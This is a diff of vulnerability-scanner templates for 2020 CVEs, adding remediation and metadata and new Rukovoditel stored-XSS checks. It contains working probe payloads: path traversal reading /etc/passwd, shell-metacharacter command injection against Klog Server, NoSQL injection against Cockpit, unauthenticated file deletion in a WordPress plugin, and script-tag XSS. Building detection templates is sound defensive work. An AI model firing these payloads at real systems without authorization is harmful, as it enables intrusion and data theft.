searchblox + tags: cve,cve2020,lfi http: - method: GET @@ -31,4 +36,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/06/28 +# digest: 4a0a00473045022100fd03d653074ab1819855f15145a7348439ad8527a9b45a3f811b4edfe44e73eb022014bd09cb36ed60b34f98d16d69e55c82f9b65ddf2745ec9665c26fa495631001:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index addbf5a639..6847b72298 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI. + remediation: | + Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0. reference: - https://www.exploit-db.com/exploits/49343 - https://seclists.org/fulldisclosure/2020/Dec/13 @@ -14,11 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35598 cwe-id: CWE-22 - cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:*:*:*:*:*:*:*:* - epss-score: 0.11187 - tags: acs,edb,seclists,cve,cve2020,lfi + epss-score: 0.11926 + epss-percentile: 0.94721 + cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: advanced_comment_system_project + product: advanced_comment_system + tags: acs,edb,seclists,cve,cve2020,lfi http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/28 +# digest: 4a0a00473045022100f66d136dbb6efa3364145dd28221440e2cca75f98ac1fac44c5c193c454b4d8d02200362f6c9ca5cbe0c2875eb6261b10c7d599f1e66ac23f50a2c4f3499d1899c7e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 2e090eb8e3..65eaabd6cb 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + remediation: | + Update the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later. reference: - https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt - https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html @@ -15,10 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35713 cwe-id: CWE-78 - epss-score: 0.97287 - tags: cve,cve2020,linksys,rce,oast,router + epss-score: 0.9714 + epss-percentile: 0.99719 + cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: linksys + product: re6500_firmware + tags: cve,cve2020,linksys,rce,oast,router http: - raw: @@ -37,4 +43,4 @@ http: words: - "http" -# Enhanced by mp on 2022/04/28 +# digest: 4b0a00483046022100c739294e0efbb84c83f1b49c84c16b784cb13d12e266adbaef85b1fb957fb678022100d03248a54b94469757fac09bc184dbd7de5f8083e78ab9cc236aa4e27ac2d34a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 83c176b384..3acd7873a9 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7. + remediation: | + Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch. reference: - https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection - https://nvd.nist.gov/vuln/detail/CVE-2020-35729 @@ -15,20 +17,26 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35729 cwe-id: CWE-78 - cpe: cpe:2.3:a:klogserver:klog_server:*:*:*:*:*:*:*:* - epss-score: 0.95448 - tags: cve,cve2020,klog,rce + epss-score: 0.95886 + epss-percentile: 0.99265 + cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: klogserver + product: klog_server + tags: cve,cve2020,klog,rce +variables: + dummy: "{{to_lower(rand_text_alpha(5))}}" http: - method: POST path: - "{{BaseURL}}/actions/authenticate.php" - body: 'user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" + + body: 'user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" matchers: - type: word words: - "poc-testing" # from Base64 decoding payload -# Enhanced by mp on 2022/04/28 +# digest: 490a0046304402200f548b979dfa7b96fd55261d952138dba3dea9d0e26a176d1928e9ccf087dd85022048b3f65f05e99b1198f924621bfa431615012f4a81bb57111ba97b932489ebed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index d06b8f3d51..e1dba9714e 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1. reference: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 @@ -14,11 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35736 cwe-id: CWE-22 - cpe: cpe:2.3:a:liftoffsoftware:gateone:*:*:*:*:*:*:*:* - epss-score: 0.01553 - tags: cve,cve2020,gateone,lfi + epss-score: 0.01291 + epss-percentile: 0.84337 + cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: liftoffsoftware + product: gateone + tags: cve,cve2020,gateone,lfi http: - method: GET @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/28 +# digest: 4b0a00483046022100bf572a24ee127aa79a32dd528ee7220bb4e479cf4aedc70d64541d01ad806e63022100aa1319928f0810fc8543f52ea747fd37280889a4d820d0f40c3ba28427ea084e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 930717622e..3fe553d4f3 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion. + remediation: | + Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability. reference: - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 @@ -15,11 +17,15 @@ info: cvss-score: 7.7 cve-id: CVE-2020-35749 cwe-id: CWE-22 - cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:*:*:* - epss-score: 0.01796 - tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve + epss-score: 0.017 + epss-percentile: 0.86353 + cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + vendor: presstigers + product: simple_board_job + framework: wordpress + tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve http: - raw: @@ -31,12 +37,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: regex @@ -47,4 +53,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/28 +# digest: 4a0a00473045022100eb6d23d2d613bc4401966d197f9c0e15f24e1e16844b57b16d65bc98783b2ee10220266f50e24393bb0c795eb9818c7eb82c101232500369eb705de39ccc39dcbe54:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index c55957a3cf..f335e0b741 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala. + remediation: | + Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability. reference: - https://advisory.checkmarx.net/advisory/CX-2020-4287 - https://nvd.nist.gov/vuln/detail/CVE-2020-35774 @@ -16,11 +18,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35774 cwe-id: CWE-79 - cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* epss-score: 0.97219 - tags: cve,cve2020,xss,twitter-server + epss-percentile: 0.99766 + cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: twitter + product: twitter-server + tags: cve,cve2020,xss,twitter-server http: - method: GET @@ -34,13 +39,13 @@ http: words: - '' - - type: status - status: - - 200 - - type: word part: header words: - text/html -# Enhanced by mp on 2022/04/04 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100e8394479cf357bcb45998e7680bd36633fd99b1f14fb9e8ac208601e571f318f022100c787103850f43d8aa0cdb3bb309856fb19f0cc3686d21218513d18eb4543346e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index c2af0bb597..d82fe932d3 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links. + remediation: | + Apply the latest security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://twitter.com/ptswarm/status/1408050644460650502 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe @@ -15,10 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-3580 cwe-id: CWE-79 - epss-score: 0.97346 - tags: cve,cve2020,xss,cisco,kev + epss-score: 0.97048 + epss-percentile: 0.9967 + cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: firepower_threat_defense + tags: cve,cve2020,xss,cisco,kev http: - raw: @@ -32,17 +38,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - "text/html" -# Enhanced by mp on 2022/08/14 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ef277477cad9473286b5b66c9507683a712a0a14e7078d7e688e4053ca74b88a022100969d6c601e1d919cbe6dbbef807d7bcfc149d2598369ad09ceacf6690d37c623:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index d865ea9b33..adb9a10e15 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -5,28 +5,33 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. + remediation: | + Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35846 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 + epss-score: 0.82538 + epss-percentile: 0.98047 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.78273 - tags: cve,cve2020,nosqli,sqli,cockpit,injection metadata: max-request: 1 + vendor: agentejo + product: cockpit + tags: cve,cve2020,nosqli,sqli,cockpit,injection http: - method: POST path: - "{{BaseURL}}/auth/check" - headers: - Content-Type: application/json + body: | { "auth": { @@ -39,14 +44,18 @@ http: } } + headers: + Content-Type: application/json + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - "password_verify() expects parameter" -# Enhanced by mp on 2022/04/28 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100f696d0b7f4716d37b090d0603e403ef0bc117e8c6cbae08c2a81c24374c47352022100ebde060eac152f93d2ddadf8168ffb75d4131960133a6c7b2cc9f456362e2bf6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 802b2a9832..e46373b503 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -6,22 +6,28 @@ info: severity: critical description: | Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller. + remediation: | + Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35847 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 + epss-score: 0.74725 + epss-percentile: 0.97795 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.80883 metadata: - max-request: 2 - shodan-query: http.favicon.hash:688609340 verified: true + max-request: 2 + vendor: agentejo + product: cockpit + shodan-query: http.favicon.hash:688609340 tags: cve,cve2020,nosqli,sqli,cockpit,injection http: @@ -36,7 +42,6 @@ http: "$func": "var_dump" } } - - | POST /auth/requestreset HTTP/1.1 Host: {{Hostname}} @@ -57,12 +62,14 @@ http: - type: regex part: body_1 + negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"' - negative: true - type: regex part: body_2 + negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' - negative: true + +# digest: 4b0a00483046022100ea9b0e779b9635496833820800d583bce350aa6c3d3da6e8bf1e41243f0d542b022100a3da4ef3c23fe06983edc82fd4079da8dc1df3e866c41a062697ad02cffc13a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index a2debe313c..3b4fd28fd6 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -5,28 +5,33 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form. + remediation: | + Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35848 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 + epss-score: 0.71273 + epss-percentile: 0.97698 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.72481 - tags: cve,cve2020,nosqli,sqli,cockpit,injection metadata: max-request: 1 + vendor: agentejo + product: cockpit + tags: cve,cve2020,nosqli,sqli,cockpit,injection http: - method: POST path: - "{{BaseURL}}/auth/newpassword" - headers: - Content-Type: application/json + body: | { "token": { @@ -34,10 +39,12 @@ http: } } + headers: + Content-Type: application/json matchers: - type: regex part: body regex: - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' -# Enhanced by mp on 2022/04/28 +# digest: 490a00463044022042812370f744b45ad027a1e0bb885e85c0906e429f4be506bff85c9ffb33972b0220545bc77cb19ce19a379fa9f7e348a194a28d375cbd9aa768a9e25aa81761a51f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index e28254c53d..254e1a525b 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). + remediation: | + Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability. reference: - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35951 @@ -14,22 +16,24 @@ info: cvss-score: 9.9 cve-id: CVE-2020-35951 cwe-id: CWE-306 - cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:*:*:* - epss-score: 0.00217 - tags: cve2020,wordpress,wp-plugin,wpscan,cve + epss-score: 0.00174 + epss-percentile: 0.5442 + cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 + vendor: expresstech + product: quiz_and_survey_master + framework: wordpress + tags: cve2020,wordpress,wp-plugin,wpscan,cve,intrusive http: - raw: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} @@ -45,31 +49,30 @@ http: {{fullpath}}wp-content/plugins/quiz-master-next/README.md ------WebKitFormBoundaryBJ17hSJBjuGrnW92-- - - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} + req-condition: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master') + + - type: word + part: body + words: + - '{"type":"success","message":"File removed successfully"}' + extractors: - type: regex name: fullpath - internal: true - part: body group: 1 regex: - - "not found in ([/a-z_]+)wp" - - req-condition: true - matchers-condition: and - matchers: - - - type: word - words: - - '{"type":"success","message":"File removed successfully"}' + - not found in ([/a-z_]+)wp + internal: true part: body - - type: dsl - dsl: - - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" - -# Enhanced by mp on 2022/04/28 +# digest: 4b0a0048304602210091cb47036aa12c0be8b32fac5314e91ca1a998fef67de933e7f7d6d4857a57ad022100c2872685115f6a78ec4d95909c48291686e5fd14782992a01e1ea380fb7b8cc4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml new file mode 100644 index 0000000000..5fae0a474a --- /dev/null +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -0,0 +1,67 @@ +id: CVE-2020-35984 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + remediation: | + Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35984 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35984 + cwe-id: CWE-79 + epss-score: 0.00127 + epss-percentile: 0.47039 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: rukovoditel + product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + - | + POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true + +# digest: 4b0a00483046022100c2028a5f1e8562b4eefadbdeaa484b6ff846bfe3007e8e89c104954f0a2bbc20022100cad10dc609a7001da6509277a15a893e209aa8c8b0699aad87597ace6afd7700:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml new file mode 100644 index 0000000000..e4ed93c1b6 --- /dev/null +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -0,0 +1,67 @@ +id: CVE-2020-35985 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + remediation: | + Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35985 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35985 + cwe-id: CWE-79 + epss-score: 0.00127 + epss-percentile: 0.47039 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: rukovoditel + product: rukovoditel + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + - | + POST /index.php?module=global_lists/lists&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true + +# digest: 4a0a00473045022100d82951884bb94d4ec65435cc6fcea931308d2b6b470ed02d9e627b9fb9b19268022053e3c4df2e410fc0104a3a41f77dc620d0043658ec8b8d4e088c3029929561ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml new file mode 100644 index 0000000000..ab1b63968c --- /dev/null +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -0,0 +1,67 @@ +id: CVE-2020-35986 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + remediation: | + Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35986 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35986 + cwe-id: CWE-79 + epss-score: 0.00127 + epss-percentile: 0.47039 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: rukovoditel + product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + - | + POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true + +# digest: 490a004630440220614e5edc38ac0ed27a4f57b2dd699f525e3ea6aae29f4458f380932fb3026f9f02205cc1ee68aae5900b088ac05ea180838519d5503fa076ae492c7217f14687485b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml new file mode 100644 index 0000000000..799849fdb2 --- /dev/null +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -0,0 +1,67 @@ +id: CVE-2020-35987 + +info: + name: Rukovoditel <= 2.7.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + remediation: | + Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35987 + cwe-id: CWE-79 + epss-score: 0.00127 + epss-percentile: 0.47039 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* + metadata: + 